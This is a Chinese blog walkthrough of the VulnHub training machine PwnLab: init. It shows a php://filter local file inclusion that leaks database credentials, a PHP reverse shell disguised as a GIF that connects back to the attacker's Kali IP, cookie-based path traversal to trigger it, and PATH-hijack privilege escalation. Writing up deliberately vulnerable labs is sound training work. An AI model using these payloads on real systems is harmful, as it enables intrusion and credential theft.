18-VulnHub-pwnlab_init

最新推荐文章于 2023-12-12 19:21:02 发布
最新推荐文章于 2023-12-12 19:21:02 发布
阅读量701 收藏 1
点赞数
分类专栏: vulnhub50 文章标签: 数据库 linux 安全 shell python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809826/article/details/119658020
版权

18-VulnHub-PwnLab: init

靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/

目标:得到root权限&找到flag.txt

作者:尼德霍格007

时间:2021-8-12

注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

nmap扫描靶机地址

image-20210812232100268

看到靶机地址是192.168.21.6

扫描靶机开放端口

image-20210812232203581

看到靶机开放了80、111、3306和53200端口

用nikto扫描web中隐藏或配置错误的目录或文件

nikto -h 192.168.21.6

image-20210812232610945

显示config.php可能包含数据库账户和密码,还有登录页面和/images目录等

访问一下web服务

image-20210812232837128

image-20210812232903153

可以看出存在LFI漏洞利用

直接按照意思输出访问即可找到base64值

http://192.168.21.6/?page=php://filter/convert.base64-encode/resource=config

image-20210812233415673

base64解码一下

PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+

解出来是

<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

得到了数据库的账户和密码,登录

mysql -uroot -pH4u%QJ_H99 -h 192.168.21.6

image-20210812233705983

找到几个账户

image-20210812233848352

密码是base64编码,把密码解码一下,如下

userpass
kentJWzXuBJJNy
mikeSIfdsTEn6I
kaneiSv5Ym2GRo

在web端登陆一下

image-20210812234221336

登陆成功就可以上传文件了

image-20210812234253368

二、获取shell

找个php木马,这是一个反弹shell的木马

GIF89a
<?php
$sock=fsockopen('192.168.21.128',8080);
$descriptorspec=array(
0-->$sock,
1-->$sock,
2-->$sock
);
$process=proc_open('/bin/bash',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

保存为GIF文件并上传

image-20210812234541969

在页面源码中即可看到上传的文件在服务器中的文件名

image-20210812234655673

上传成功,下一步需要触发这个木马。

dirb扫描一下网站目录

image-20210812234905648

发现index有个php文件,有了前面的config.php的经验,我们再来一次

http://192.168.21.6/?page=php://filter/convert.base64-encode/resource=index

image-20210812235132514

解码

PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=

得到

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>

<head>
<title>PwnLab Intranet Image Hosting</title>
</head>

<body>

<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>

</body>
</html>

第6行显示include(“lang/”.$_COOKIE[‘lang’]);意思是使用lang可以打开会话

因为我们使用的反弹式shell,要先开启监听

image-20210812235906444

使用curl工具

curl -v --cookie "lang=../upload/b1a99ebaad4dd28f57517de36e770484.gif" http://192.168.21.6/index.php

因为lang是在index.php中得到的,所以要用它来访问上传的gif

这边即可获取到shell

image-20210812235933407

但是是低权限

先用python获取一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20210813000214407

三、提权

刚才我们的到了3个账户,换个账户

image-20210813000914974

进入kane目录

image-20210813000949945

发现了一个msgmike,是一个文件,执行一下

image-20210813001201078

提示找不到文件/home/mike/msg.txt

在tmp目录下创建一个cat文件,内容是/bin/bash

修改环境变量后让msgmike执行bash -i获得mike的权限

image-20210813001419664

image-20210813001524959

返回kane目录执行msgmike

image-20210813001645103

看到mike用户在mike和kane组中

image-20210813002814455

进入mike用户

image-20210813003122368

有个文件,执行一下

image-20210813003250161

提权成功,查看flag
image-20210813003530858

四、总结

针对PHP伪协议的学习和文件上传漏洞、文件解析漏洞、文件包含漏洞、反弹shell重新回顾了下。整体难度中等。

整体思路如下

靶机 --> 主机端口探测 --> web渗透 --> 文件包含 --> 得到数据库账号密码 --> 在数据库中查到登录账号密码 --> 查看源码 --> 文件上传木马 --> 通过Cookie文件包含 --> 反弹shell --> 切换账户 --> 利用环境变量提权 --> 找到flag

尼德霍格007
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwnlab-init靶机渗透测试
weixin_49340699的博客
07-14 872
pwnlab-init靶机渗透测试流程 流程 首先信息收集对目标网段进行扫描 netdiscover -i etho -r 192.168.19.0/24 发现目标主机192.168.19.149 用nmap对目标主机端口扫描 nmap -sV 192.168.19.149 开了三个端口 80 111 3306 首先访问80端口 三个页面有上传,登录,和一个啥也没有的home页面上传要求先登录 从登录页面下手 打开登录页面可以看到这个url很敏感 应该是存在文件包含漏洞 先扫一下目录看看有没有发
dumb_init-1.2.2-py2.py3-none-manylinux1_x86_64.zip
08-16
Python 中的dumb-init模块,通过下载该模块并解压,将解压后的文件夹放入Python的安装目录中的\Lib\site-packages中
VulnHub-pwnlab_init渗透
chengshiming520的博客
06-17 915
VulnHub-pwnlab_init渗透
【甄选靶场】Vulnhub百个项目渗透——项目十八:pwnlab_init(LFI本地文件包含,PHP伪协议,文件上传绕过,逆向分析)
人间体佐菲的博客
09-21 1413
网络安全,信息安全,渗透测试
pwnlab_init
底层社会中的弱智
04-29 1093
找到目标IP 192.168.11.131 扫描端口 开放80端口 apache中间件版本暂无可用exp 3306mysql数据库 111 rdp远程桌面 先扫一下80的目录 看到config.php 然后可能存在注入 使用sqlmap无结果放弃注入 查看URL 可能存在文件包含 http://192.168.11.131/index.php?page=...
vulnhub PwnLab: init
箭雨镜屋
01-03 3037
本文思路: nmap扫描---->dirb扫描---->nikto扫描---->LFI读取config.php,获得数据库账号密码---->远程登录mysql找到网站用户账户---->上传图片马,通过LFI(cookie参数值)获得反弹shell---->修改$PATH配合suid得到mike的shell---->suid结合命令注入提权
python 3.74 运行import numpy as np 报错lib\site-packages\numpy\__init__.py
09-18
主要介绍了python 3.74 运行import numpy as np 报错libsite-packagesnumpy__init__.py,原来需要更新一下numpy即可
u-boot的board_init_f和board_init_r阶段执行任务的对比
07-25
u-boot 的 board_init_f 和 board_init_r 阶段执行任务的对比 u-boot 是一个开放源代码的引导加载程序,广泛应用于嵌入式系统和嵌入式设备中。它提供了一个灵活的引导机制,能够适应各种不同的硬件平台和操作系统。...
Atlas-master_目标检测_atlas_atlas-master_yolov4_
10-01
基于模式化稀疏度的剪枝方法能够使深度神经网络在图像识别任务中「看得」更清楚,同时减小了模型尺寸,使模型在移动端「跑得」更快,实现实时推理。
u-boot的board_init_f函数执行序列的功能分析
06-10
18. setup_dest_addr 函数:这个函数用于设置重定位首地址 gd->relocaddr = gd->ram_top = gd->ram_base + gd->ram_size。 19. fix_fdt 函数:这个函数用于备树的单板特定操作。 20. reserve_pram 函数:这个函数...
No.18-VulnHub-PwnLab: init-Walkthrough渗透学习
qq_34801745的博客
01-15 1685
** VulnHub-PwnLab: init-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 靶机难度:中级(CTF) 靶机发布日期:2016年8月1日 靶机描述:Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to b...
黑盒渗透测试vulnhub--PwnLab: init
qq_21383109的博客
10-11 124
输入cd && /bin/sh,利用命令执行,拿到root权限。使用curl修改cookie的值,使其包含上传的木马文件。使用base64解码后得到可能为mysql的账号密码。利用php伪协议查看网站upload.php源码。扫描端口发现80、111、3306端口开放。发现页面发生错误,证明变量后的参数可控。将一句话木马上传到网站,并记录文件路径。page=index。尝试php伪协议读取config文件。使用whatweb扫描靶机网站信息。切换界面发现url存在page变量。直接上传php文件发现失败。
Vulnhub靶机 PWNlab_init
菜浪马废的博客
04-15 1208
找到靶机ip 扫描到端口 发现/config.php LFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358 解码 得到了一个数据库账号 登录进去,看见三组账号(登录时加-D,不然不能登录) kent | Sld6WHVCSkpOeQ== JWzXuBJJNy mike | U0lmZHNURW42S...
pwnlab_init靶机
小小猪的博客
06-09 306
pwnlab_init靶机 arp-scan -l 查询靶机ip地址 nmap -sV -Pn -A x.x.x.231 发现开放80,111,3306端口 发现登录界面 查看URL http://x.x.x.231/index.php?page=login 可能存在文件包含漏洞 此文件包含不用填写后缀名http://x.x.x.231/index.php?page=php://filter/convert.base64-encode/resource=config .
OSCP pwnlab_init 靶机渗透
Shadow的博客
04-07 419
pwnlab_init 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-07 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 pwnlab_init主机ip为172.16.1.20 nmap -A -p- 172.16.1.20 我们看到开启了80、3306等端口,登..
vulnhub靶场--pwnlab_init靶场
zzzzzzkeai的博客
12-08 345
vulnhub靶场--pwnlab_init靶场
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3086
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
2021年2月2日-NO18-Vulnhub-pwnlab_init-渗透学习
AnonyMousIT的博客
02-03 358
2021年2月2日-NO18-Vulnhub-pwnlab_init-渗透学习 一、简介 二、信息收集 扫描端口 可以看到 开放着80,111,3306,49422端口 使用nikto 网站进行扫描 看到 config.php可能含有数据库id和密码 访问web页面 这里可以看出 存在LFI(本地文件包含漏洞) 参考文章 https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ http://192.168.
红队打靶练习:PWNLAB: INIT
最新发布
分享
12-12 637
【代码】红队打靶练习:PWNLAB: INIT。犹如蟒蛇缠绕般的窒息感.......
请将下列shell语句转换为python语句:for ((i = 0; i < $num_gpus; ++i)); do { gpu_id=$(echo $CUDA_VISIBLE_DEVICES | cut -d',' -f$[$i+1]) python wenet/bin/train.py --gpu $gpu_id \ --config $train_config \ --data_type $data_type \ --symbol_table $dict \ ${bpemodel:+--bpe_model ${bpemodel}.model} \ --train_data data/$train_set/data.list \ --cv_data data/$train_dev/data.list \ ${checkpoint:+--checkpoint $checkpoint} \ ${enc_init:+--enc_init $enc_init} \ --enc_init_mods $enc_init_mods \ --model_dir $dir \ --ddp.init_method $init_method \ --ddp.world_size $num_gpus \ --ddp.rank $i \ --ddp.dist_backend $dist_backend \ --num_workers 6 \ $cmvn_opts } & done wait
06-10
set}/data.list --cv_data data/{train_dev}/data.list {'--checkpoint ' + checkpoint if checkpoint else ''} {'--enc_init ' + enc_init if enc_init else ''} --enc_init_mods {enc_init_mods} --model_dir {dir...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值